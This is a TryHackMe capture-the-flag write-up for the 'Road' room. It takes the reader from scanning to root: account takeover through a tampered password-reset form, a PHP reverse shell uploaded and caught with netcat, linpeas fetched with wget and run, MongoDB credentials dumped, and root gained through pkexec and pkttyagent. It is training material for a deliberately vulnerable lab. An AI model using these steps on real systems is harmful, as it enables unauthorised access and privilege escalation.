YouTube
THM Road Video now live!
THM Road Writeup
The writeup below is for the Road room on TryHackMe, This room is labelled as a medium difficulty and I’ve included the links to the room below.
Brief
I had a read through the brief and the only two clues on there are the flags are user.txt and root.txt, I didn’t have much to go on as a starting point!
Starting Out
Starting out I did the usual Nmap scan, exported so I can refer back to this if I need to.
nmap -sV -sC -p- -A -T5 -oN ./nmap/initial <IP>

Having looked through the Nmap output, the logical step was to move on to Web Enumeration.
Reach for the Sky!
Heading to the site on port 80 I was greeted with the below;

I had a read through the sites source code and looked through some of the Java script, but ultimately we want to go to the merchant central link in the top right.
Within there, create a user account with any random email address and password then log in.
From the profile page by clicking on the top right, I found an option to upload a new profile picture

So, With the admins login name, it was time to get their password!
I found the reset user option on the left side, I could have intercepted a request either using firefox’s network tab or burpsuite, but i wanted to see if there was a quicker way. There was….

There was a way! Right clicking and inspecting element allowed me to change the username in the box to the admin username. I then just typed a new password in and I was good to go with the admin account!
Reversing Down the Road
This new access was great, but I decided now was the time to use the file upload function to upload a PHP reverse shell.

I use the Reverse shell from pentest monkey, to be on the safe side as its expecting an image file I made the name revshell.img.php.
I then started my listener with;
nc -lnvp 9002
# 9002 is the port set within the PHP file
Once I uploaded this I found the upload directory was not the same directory the current profile image was in.
Searching through the source code, I managed to find this!

As this directory wont display file listings, you need to type the full path to your uploaded reverse shell.
Once I went to this path, I had my reverse shell on my netcat listener which I upgraded with;
python3 -c 'import pty; pty.spawn("/bin/bash")'
# just using python does not work, you have to use python3

First Flag and Escalation
Finding the first flag was straightforward in the only user’s home directory. I could just change into this directory and read the file with my permission as www-data

From here I knew I would have to elevate my privilege somehow, so I decided to enumerate the box using Linpeas.
From my Linpeas directory I started a webserver with;
python3 -m http.server 8090
# 8090 is the port I wanted to open this on
Then on the box I used;
cd tmp
wget http://<MY_THM_IP>:8090/linpeasn.sh
chmod +x linpeasn.sh
./linpeasn.sh
# I have 2 versions of linpeas in the directory I changed to, the one I used is linpeasn.sh

When Linpeas had finished there were a few areas I had identified, the main 2 were;
- Pkexec – https://gtfobins.github.io/gtfobins/pkexec/ – This would allow for root access BUT the user I currently had wasn’t a sudoer
- MongoDB – MongoDB is running on this box
Mongo DB was the obvious choice and did indeed contain a password for the webdeveloper account
To get this I used;
mongo
#wait for mongo to load
show dbs
use backup
show collections
db.user.find()
From there I had the webdeveloper password and I could now SSH into the box as the webdeveloper.

ssh webdeveloper@<THM_IP>
Pkexec – Works first time?

Absolutely not!
It was worth a try, but with this being Ubuntu, it wont work in command line. Luckily, I’ve done a box before where this was the case so I know a way around this.
NOTE: This is where something like tilix really helps because you need two terminal windows and for me, it helps to have them side by side.
Open up a new terminal window and SSH again as the webdeveloper account
In the original terminal type;
echo $$
# This will give you the PID of that SSH session
Then in the 2nd terminal type;
pkttyagent -p <PID>
# This is the PID from the first SSH Terminal
Back to the first terminal and type;
pkexec /bin/bash
This will then prompt you to enter the webdeveloper password on the 2nd terminal window, once done you will be the root user on your first terminal and in the root directory.
The root flag is there and can now be read

Conclusion
The THM Road box is a good challenge as not everything is as straightforward as it appears. The method above doesn’t cover everything I tried, its purely the method I used to complete it. I hope this writeup helped you along the way if you got stuck.
As always, if You’ve got any suggestions for the next one drop me a message or leave me a comment on youtube.
Links
https://www.youtube.com/channel/UC_QsRV3S9N5mMkvFXZfY1GQ – Youtube Channel
https://tryhackme.com/room/road – Link to the Road Room to try for yourself
https://tryhackme.com – Link to tryhackme
Contact Me – Get in Touch
Thank you as always for reading
Marc